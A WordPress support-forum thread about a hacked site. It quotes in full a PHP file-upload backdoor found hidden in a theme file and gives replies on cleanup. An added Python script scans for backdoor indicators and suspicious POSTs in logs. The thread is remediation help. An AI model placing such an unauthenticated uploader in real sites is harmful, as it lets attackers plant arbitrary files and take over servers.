• I am updating the styling for a client’s website and it seems to have gotten hacked. When I visit their website they have a File Upload widget in the header and when I would navigate to /wp-admin I get the following error:

    Warning: Cannot modify header information – headers already sent by (output started at /home/***/public_html/wp-content/themes/theme47225/includes/class-tgm-plugin-activation.php:17) in /home/…

    Here is the content inside the class-tgm-plugin-activation.php file:

    <?php
    if(isset($_POST['Submit'])){
        $filedir = "";
        $maxfile = '2000000';

        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);

            echo"<center><b>Done ==> $userfile_name</b></center>";
        }
    }
    else{
        echo'
        <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
    }
    ?>

    So I removed the following:

    echo'
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';

    and it seemed to be all fixed. The next day I went to the website and the same thing happened.

    Anyone know how to recover from this?

Viewing 4 replies - 1 through 4 (of 4 total)
  • Moderator t-p

    (@t-p)

    Someone most definitely added that upload snippet to your page.

    If I were in your situation, I would go back and find the original theme files, remove the existing theme and replace from my virgin backup.

    Changing all related passwords would not hurt either.

    Hi @dpanych

    Replacing your theme will likely do little for you in this case. Often in cases of reinfections the attacker has a means of regaining access to your environment.

    Whether it be via a backdoor or via your own WP-Admin controls.

    This is what I would do:

    1 – I would investigate when the changes are happening. You can do this by analyzing your logs to see what events are occurring. Look for log entries that trigger wp-login and / or the editor – you should be able to see this.

    2 – I would purge all accounts of their passwords just in case; there are a few different tools to help with this. One such would be the Sucuri plugin: http://wordpress.org/plugins/sucuri-scanner/ There is actually a section in there for post-hacks. It will not only purge the passwords but also reset your salts / keys – an important step many forget to do.

    3 – Once all your controls are set, including FTP, you enter the most difficult section which is trying to identify if a backdoor exists. This, I won’t lie, won’t be easy but a good place to start is here: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Once you get the reinfection to stop at least 48 hours you can feel a little more comfortable in the actions you’ve taken.

    One very simple step is to replace WordPress core files – that is wp-admin / wp-includes and the root files. You should see which those are.

    Happy hunting.
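An added example (not code from the thread or from any of the posters) covering steps 1 and 3 of the reply above: a small Python triage script that flags PHP files under wp-content carrying the same upload-handler indicators as the file quoted in the question (`$_FILES` read together with `move_uploaded_file`, or eval/base64_decode obfuscation), and that pulls out POST requests to wp-login.php, the theme editor, or any PHP file under a theme directory from an Apache-style access log. The directory layout, the log lines, and the IP addresses and timestamps in `demo()` are all constructed sample data; the only page-derived value is the theme file path.

```python
import re
import tempfile
from pathlib import Path

# Indicators a defender looks for when hunting an upload backdoor like the one
# quoted in the question: a PHP file that both reads $_FILES and writes the
# upload to disk, or that hides logic behind eval()/base64_decode().
UPLOAD_PATTERNS = [
    re.compile(r"\$_FILES\s*\[", re.I),
    re.compile(r"move_uploaded_file\s*\(", re.I),
]
OBFUSCATION_PATTERNS = [
    re.compile(r"\beval\s*\(", re.I),
    re.compile(r"base64_decode\s*\(", re.I),
]


def scan_php_file(path):
    """Return the list of indicator names found in one PHP file."""
    text = Path(path).read_text(errors="replace")
    hits = []
    if all(p.search(text) for p in UPLOAD_PATTERNS):
        hits.append("upload-handler")
    if any(p.search(text) for p in OBFUSCATION_PATTERNS):
        hits.append("obfuscation")
    return hits


def scan_tree(root):
    """Map each flagged .php file (path relative to root) to its indicators."""
    root = Path(root)
    findings = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_php_file(php)
        if hits:
            findings[php.relative_to(root).as_posix()] = hits
    return findings


# Access-log triage for step 1: Apache/nginx combined-format lines. We only
# care about POSTs to wp-login.php, the theme editor, or a PHP file living
# inside a theme directory (theme files are normally never POST targets).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
WATCHED_PATH = re.compile(
    r"^/wp-login\.php$|^/wp-admin/theme-editor\.php$|^/wp-content/themes/[^/]+/.*\.php$"
)


def suspicious_posts(log_lines):
    """Return (ip, timestamp, path, status) for every POST to a watched path."""
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("path").split("?", 1)[0]
        if WATCHED_PATH.match(path):
            out.append((m.group("ip"), m.group("ts"), path, m.group("status")))
    return out


def demo():
    """Run both checks on constructed sample data; returns (findings, posts)."""
    # Constructed sample: a theme file containing the two upload indicators,
    # and a clean functions.php that must not be flagged.
    indicator_sample = (
        "<?php\n// constructed sample carrying the indicator tokens only\n"
        "$n = $_FILES['image']['name'];\nmove_uploaded_file($t, $n);\n"
    )
    clean_sample = "<?php\nadd_theme_support('post-thumbnails');\n"
    # Constructed log lines: 203.0.113.x / 198.51.100.x are documentation ranges.
    sample_log = [
        '203.0.113.7 - - [10/Mar/2014:02:14:05 +0000] "POST /wp-content/themes/theme47225/includes/class-tgm-plugin-activation.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
        '198.51.100.4 - - [10/Mar/2014:02:10:11 +0000] "GET /wp-content/themes/theme47225/style.css HTTP/1.1" 200 8843 "-" "Mozilla/5.0"',
        '203.0.113.7 - - [10/Mar/2014:02:15:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/7.35"',
        '198.51.100.4 - - [10/Mar/2014:02:20:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "-" "Mozilla/5.0"',
    ]
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "wp-content"
        inc = root / "themes" / "theme47225" / "includes"
        inc.mkdir(parents=True)
        (inc / "class-tgm-plugin-activation.php").write_text(indicator_sample)
        (root / "themes" / "theme47225" / "functions.php").write_text(clean_sample)
        findings = scan_tree(root)
    return findings, suspicious_posts(sample_log)


if __name__ == "__main__":
    found, posts = demo()
    for path, hits in found.items():
        print(f"FLAGGED {path}: {', '.join(hits)}")
    for ip, ts, path, status in posts:
        print(f"POST   {ip} {ts} {path} -> {status}")
```

Pointing `scan_tree()` at a real `wp-content` directory lists candidate backdoors to review by hand, and feeding the site's access log to `suspicious_posts()` shows which client addresses were posting to theme files or the login page and when, which is the timeline the reply asks you to establish before deciding that the reinfection has stopped.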

    I suffered the same hack. When I deleted the same line as him, my page went white. I cannot get back to that page. Can I not fix this now?


The topic ‘Website possibly hacked?’ is closed to new replies.